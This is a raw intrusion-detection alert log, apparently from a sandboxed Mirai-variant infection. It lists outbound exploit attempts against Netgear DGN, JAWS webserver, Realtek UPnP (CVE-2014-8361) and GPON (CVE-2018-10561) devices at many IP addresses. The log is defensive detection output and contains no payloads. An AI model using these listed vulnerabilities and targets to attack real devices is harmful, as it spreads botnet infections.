                                                                  2024-11-28T07:28:21.572355+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2358972122.91.172.14680TCP
                                                                  2024-11-28T07:28:21.572726+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348936200.60.162.4080TCP
                                                                  2024-11-28T07:28:21.572726+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2348936200.60.162.4080TCP
                                                                  2024-11-28T07:28:21.573119+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345202175.127.32.9980TCP
                                                                  2024-11-28T07:28:21.573119+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345202175.127.32.9980TCP
                                                                  2024-11-28T07:28:21.574591+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347488129.113.117.2017574TCP
                                                                  2024-11-28T07:28:21.576071+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235768482.116.130.805555TCP
                                                                  2024-11-28T07:28:21.576438+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347342209.214.96.2547574TCP
                                                                  2024-11-28T07:28:21.577174+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359396148.252.76.1087574TCP
                                                                  2024-11-28T07:28:21.578631+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236075850.82.114.4880TCP
                                                                  2024-11-28T07:28:21.578631+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.236075850.82.114.4880TCP
                                                                  2024-11-28T07:28:21.579352+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2335962220.226.175.25380TCP
                                                                  2024-11-28T07:28:21.579722+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234958020.60.103.14780TCP
                                                                  2024-11-28T07:28:21.580087+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235632623.120.155.20880TCP
                                                                  2024-11-28T07:28:21.580568+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339610105.99.123.1738080TCP
                                                                  2024-11-28T07:28:21.581286+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357344188.62.117.11380TCP
                                                                  2024-11-28T07:28:21.581664+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348266125.76.215.128080TCP
                                                                  2024-11-28T07:28:21.582028+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346756220.213.171.15280TCP
                                                                  2024-11-28T07:28:21.582028+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2346756220.213.171.15280TCP
                                                                  2024-11-28T07:28:21.582403+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235425227.224.177.18880TCP
                                                                  2024-11-28T07:28:21.582768+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235507665.55.17.338080TCP
                                                                  2024-11-28T07:28:21.583511+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235216093.175.168.1558080TCP
                                                                  2024-11-28T07:28:21.584606+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233283476.152.169.20880TCP
                                                                  2024-11-28T07:28:21.585005+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353220191.108.27.8380TCP
                                                                  2024-11-28T07:28:21.585340+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2342546110.87.214.8752869TCP
                                                                  2024-11-28T07:28:21.585752+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235517678.194.76.18980TCP
                                                                  2024-11-28T07:28:21.586851+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2353268212.67.65.968080TCP
                                                                  2024-11-28T07:28:21.587227+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2342708110.69.45.22152869TCP
                                                                  2024-11-28T07:28:21.587599+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2334816143.125.99.608080TCP
                                                                  2024-11-28T07:28:21.588352+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341004145.189.228.4680TCP
                                                                  2024-11-28T07:28:21.588720+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345058222.71.55.19780TCP
                                                                  2024-11-28T07:28:21.588720+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345058222.71.55.19780TCP
                                                                  2024-11-28T07:28:21.588733+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351846166.252.165.1428080TCP
                                                                  2024-11-28T07:28:21.589416+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.236093449.174.147.7252869TCP
                                                                  2024-11-28T07:28:21.589857+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359526112.149.230.1477574TCP
                                                                  2024-11-28T07:28:21.590578+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333998118.181.71.15849152TCP
                                                                  2024-11-28T07:28:21.591331+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233771463.200.102.1717574TCP
                                                                  2024-11-28T07:28:21.591693+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349396103.249.111.107574TCP
                                                                  2024-11-28T07:28:21.592809+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338514122.52.227.549152TCP
                                                                  2024-11-28T07:28:21.593185+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235482467.150.217.16280TCP
                                                                  2024-11-28T07:28:21.593918+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2348550163.29.225.10980TCP
                                                                  2024-11-28T07:28:21.594672+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2356744143.251.2.19852869TCP
                                                                  2024-11-28T07:28:21.595034+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.235938892.61.151.17752869TCP
                                                                  2024-11-28T07:28:21.595453+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234088213.117.120.12980TCP
                                                                  2024-11-28T07:28:21.596156+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2359942134.101.144.10352869TCP
                                                                  2024-11-28T07:28:21.596898+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235599444.79.80.807574TCP
                                                                  2024-11-28T07:28:21.597261+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344686126.30.37.3449152TCP
                                                                  2024-11-28T07:28:21.598698+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2342588150.149.68.2008080TCP
                                                                  2024-11-28T07:28:21.599480+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234435268.164.136.2148080TCP
                                                                  2024-11-28T07:28:21.599855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234979236.30.167.448080TCP
                                                                  2024-11-28T07:28:21.600227+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348530121.133.146.208080TCP
                                                                  2024-11-28T07:28:21.600597+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2349260171.64.132.1848080TCP
                                                                  2024-11-28T07:28:21.601333+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335292216.225.199.777574TCP
                                                                  2024-11-28T07:28:21.601699+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358286184.63.218.12749152TCP
                                                                  2024-11-28T07:28:21.602442+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334854176.190.233.758080TCP
                                                                  2024-11-28T07:28:21.603180+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352046197.18.25.2375555TCP
                                                                  2024-11-28T07:28:21.603538+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233704858.181.145.449152TCP
                                                                  2024-11-28T07:28:21.604290+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233306045.122.179.1927574TCP
                                                                  2024-11-28T07:28:21.604658+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.23391768.153.189.2118080TCP
                                                                  2024-11-28T07:28:21.605409+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340128102.244.106.848080TCP
                                                                  2024-11-28T07:28:21.606492+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2355058156.94.30.23652869TCP
                                                                  2024-11-28T07:28:21.607243+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234620898.140.243.1648080TCP
                                                                  2024-11-28T07:28:21.607585+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.234314461.177.7.9352869TCP
                                                                  2024-11-28T07:28:21.607943+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235902439.56.166.8080TCP
                                                                  2024-11-28T07:28:21.608309+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2342084217.237.30.8980TCP
                                                                  2024-11-28T07:28:21.608663+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349900158.11.245.2255555TCP
                                                                  2024-11-28T07:28:21.609392+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235213071.53.95.738080TCP
                                                                  2024-11-28T07:28:21.609770+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.23475246.220.203.2098080TCP
                                                                  2024-11-28T07:28:21.610127+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234609214.231.177.4780TCP
                                                                  2024-11-28T07:28:21.610851+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2358570111.178.117.7980TCP
                                                                  2024-11-28T07:28:21.611951+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235977087.28.80.2138080TCP
                                                                  2024-11-28T07:28:21.612726+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233945228.46.37.2475555TCP
                                                                  2024-11-28T07:28:21.613042+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234627626.133.106.5480TCP
                                                                  2024-11-28T07:28:21.613042+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234627626.133.106.5480TCP
                                                                  2024-11-28T07:28:21.613400+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234361289.118.233.398080TCP
                                                                  2024-11-28T07:28:21.614127+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351612161.142.203.17849152TCP
                                                                  2024-11-28T07:28:21.614495+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346222122.119.110.13980TCP
                                                                  2024-11-28T07:28:21.615215+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345496209.173.57.597574TCP
                                                                  2024-11-28T07:28:21.657581+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2333380176.126.172.17480TCP
                                                                  2024-11-28T07:28:24.142146+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2342400102.193.207.1468080TCP
                                                                  2024-11-28T07:28:24.310998+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348470220.125.66.20080TCP
                                                                  2024-11-28T07:28:27.038744+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.235332693.186.174.18052869TCP
                                                                  2024-11-28T07:28:31.705188+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2346222122.119.110.13980TCP
                                                                  2024-11-28T07:28:31.814410+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2339868209.78.212.218080TCP
                                                                  2024-11-28T07:28:31.851813+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2344986191.45.226.738080TCP
                                                                  2024-11-28T07:28:31.892674+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2351316215.40.71.268080TCP
                                                                  2024-11-28T07:28:31.939392+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2355336130.67.243.68080TCP
                                                                  2024-11-28T07:28:31.961794+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235759875.158.5.1398080TCP
                                                                  2024-11-28T07:28:31.986325+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2357650156.166.198.1608080TCP
                                                                  2024-11-28T07:28:32.001892+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2332862218.240.42.1078080TCP
                                                                  2024-11-28T07:28:32.008217+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233746614.55.151.4080TCP
                                                                  2024-11-28T07:28:32.305030+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2354842109.73.44.11580TCP
                                                                  2024-11-28T07:28:32.305281+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235589819.97.225.2328080TCP
                                                                  2024-11-28T07:28:32.345534+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233465014.206.36.6780TCP
                                                                  2024-11-28T07:28:32.351877+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2353776196.163.229.2980TCP
                                                                  2024-11-28T07:28:32.361157+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234591499.57.40.1748080TCP
                                                                  2024-11-28T07:28:32.384417+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2350310119.24.183.338080TCP
                                                                  2024-11-28T07:28:32.392155+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234912463.216.152.23780TCP
                                                                  2024-11-28T07:28:32.392639+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235627658.13.152.918080TCP
                                                                  2024-11-28T07:28:32.398990+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235011863.93.5.5380TCP
                                                                  2024-11-28T07:28:32.414521+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2334448108.32.60.1798080TCP
                                                                  2024-11-28T07:28:32.415172+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234958020.60.103.14780TCP
                                                                  2024-11-28T07:28:32.429916+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2339610105.99.123.1738080TCP
                                                                  2024-11-28T07:28:32.461346+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2348266125.76.215.128080TCP
                                                                  2024-11-28T07:28:32.470806+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2359062152.17.230.20780TCP
                                                                  2024-11-28T07:28:32.477965+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2357344188.62.117.11380TCP
                                                                  2024-11-28T07:28:32.486259+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2353220191.108.27.8380TCP
                                                                  2024-11-28T07:28:32.492816+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233283476.152.169.20880TCP
                                                                  2024-11-28T07:28:32.492953+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235507665.55.17.338080TCP
                                                                  2024-11-28T07:28:32.508619+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2351846166.252.165.1428080TCP
                                                                  2024-11-28T07:28:32.510348+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2348672142.101.125.22552869TCP
                                                                  2024-11-28T07:28:32.517842+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2343596101.192.66.20152869TCP
                                                                  2024-11-28T07:28:32.518013+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235517678.194.76.18980TCP
                                                                  2024-11-28T07:28:32.523761+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338054109.85.10.608080TCP
                                                                  2024-11-28T07:28:32.523802+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234620898.140.243.1648080TCP
                                                                  2024-11-28T07:28:32.533031+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2341004145.189.228.4680TCP
                                                                  2024-11-28T07:28:32.535333+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234866851.143.223.687574TCP
                                                                  2024-11-28T07:28:32.539852+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235213071.53.95.738080TCP
                                                                  2024-11-28T07:28:32.540970+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349294143.224.20.18880TCP
                                                                  2024-11-28T07:28:32.546411+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235888651.218.144.208080TCP
                                                                  2024-11-28T07:28:32.548657+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2334854176.190.233.758080TCP
                                                                  2024-11-28T07:28:32.549793+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2353358191.216.182.11980TCP
                                                                  2024-11-28T07:28:32.550174+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344182142.207.82.4180TCP
                                                                  2024-11-28T07:28:32.554930+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2348530121.133.146.208080TCP
                                                                  2024-11-28T07:28:32.556586+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236067840.136.214.25049152TCP
                                                                  2024-11-28T07:28:32.565842+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2338178116.234.135.280TCP
                                                                  2024-11-28T07:28:32.580862+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235416670.1.106.23649152TCP
                                                                  2024-11-28T07:28:32.584872+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.23352605.184.240.24380TCP
                                                                  2024-11-28T07:28:32.595080+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350920160.236.191.2338080TCP
                                                                  2024-11-28T07:28:32.595545+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234979236.30.167.448080TCP
                                                                  2024-11-28T07:28:32.596301+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2340128102.244.106.848080TCP
                                                                  2024-11-28T07:28:32.613987+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335996121.230.95.9980TCP
                                                                  2024-11-28T07:28:33.437950+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2358480102.29.6.1228080TCP
                                                                  2024-11-28T07:28:33.516616+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2359292149.95.199.11152869TCP
                                                                  2024-11-28T07:28:33.527909+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2348456134.115.173.2378080TCP
                                                                  2024-11-28T07:28:33.528644+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235593871.243.11.1097574TCP
                                                                  2024-11-28T07:28:33.535229+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.234159663.102.108.22752869TCP
                                                                  2024-11-28T07:28:33.536324+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234349262.8.207.2507574TCP
                                                                  2024-11-28T07:28:33.537061+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234356070.21.24.2128080TCP
                                                                  2024-11-28T07:28:33.537804+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357110204.181.118.14680TCP
                                                                  2024-11-28T07:28:33.537804+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357110204.181.118.14680TCP
                                                                  2024-11-28T07:28:33.551825+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234278426.96.28.188080TCP
                                                                  2024-11-28T07:28:33.552982+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.234068866.249.103.22752869TCP
                                                                  2024-11-28T07:28:33.568298+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233469082.44.161.23180TCP
                                                                  2024-11-28T07:28:33.573810+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335288211.126.112.1798080TCP
                                                                  2024-11-28T07:28:33.583337+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.233830813.21.253.17452869TCP
                                                                  2024-11-28T07:28:33.594193+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.23516441.58.155.952869TCP
                                                                  2024-11-28T07:28:33.597471+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2332980174.184.127.4480TCP
                                                                  2024-11-28T07:28:33.597471+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2332980174.184.127.4480TCP
                                                                  2024-11-28T07:28:35.505569+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236029288.23.72.8580TCP
                                                                  2024-11-28T07:28:35.509599+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234333812.237.132.14149152TCP
                                                                  2024-11-28T07:28:35.510000+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233754033.213.94.858080TCP
                                                                  2024-11-28T07:28:35.510762+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235113892.41.138.607574TCP
                                                                  2024-11-28T07:28:35.511142+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2349448134.188.155.20580TCP
                                                                  2024-11-28T07:28:35.512344+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.235749444.61.47.13852869TCP
                                                                  2024-11-28T07:28:35.513504+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338642161.129.248.20580TCP
                                                                  2024-11-28T07:28:35.514971+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.234977070.243.229.2652869TCP
                                                                  2024-11-28T07:28:35.518264+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2345426166.84.151.18080TCP
                                                                  2024-11-28T07:28:35.518631+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347054213.133.80.587574TCP
                                                                  2024-11-28T07:28:35.519002+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2342848211.160.145.5380TCP
                                                                  2024-11-28T07:28:35.532435+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359850209.172.115.11349152TCP
                                                                  2024-11-28T07:28:35.533526+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234203664.169.75.5349152TCP
                                                                  2024-11-28T07:28:35.547807+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341868131.79.73.9149152TCP
                                                                  2024-11-28T07:28:35.548960+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340954190.8.212.2058080TCP
                                                                  2024-11-28T07:28:35.563625+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345392167.92.124.6349152TCP
                                                                  2024-11-28T07:28:35.578360+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346750167.112.47.3949152TCP
                                                                  2024-11-28T07:28:35.590732+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235261277.9.136.788080TCP
                                                                  2024-11-28T07:28:35.591471+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233820469.166.73.1888080TCP
                                                                  2024-11-28T07:28:35.592222+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233862227.173.140.24649152TCP
                                                                  2024-11-28T07:28:35.592592+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233658632.73.167.2088080TCP
                                                                  2024-11-28T07:28:35.605438+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235352228.38.73.15380TCP
                                                                  2024-11-28T07:28:35.605438+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235352228.38.73.15380TCP
                                                                  2024-11-28T07:28:35.606921+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2347522181.72.37.5880TCP
                                                                  2024-11-28T07:28:35.607659+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2355244186.36.111.1398080TCP
                                                                  2024-11-28T07:28:39.503692+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344322114.50.104.1280TCP
                                                                  2024-11-28T07:28:39.503692+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344322114.50.104.1280TCP
                                                                  2024-11-28T07:28:39.509833+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337984184.26.224.318080TCP
                                                                  2024-11-28T07:28:39.521470+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343248151.108.41.777574TCP
                                                                  2024-11-28T07:28:39.541137+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342174143.139.168.14880TCP
                                                                  2024-11-28T07:28:39.546230+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343998138.33.47.2377574TCP
                                                                  2024-11-28T07:28:39.549853+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2342354154.79.187.21180TCP
                                                                  2024-11-28T07:28:39.556042+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.234426679.199.27.10852869TCP
                                                                  2024-11-28T07:28:39.564765+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338334183.240.144.88080TCP
                                                                  2024-11-28T07:28:39.574593+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233523092.35.26.11480TCP
                                                                  2024-11-28T07:28:39.595399+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357780113.17.115.1957574TCP
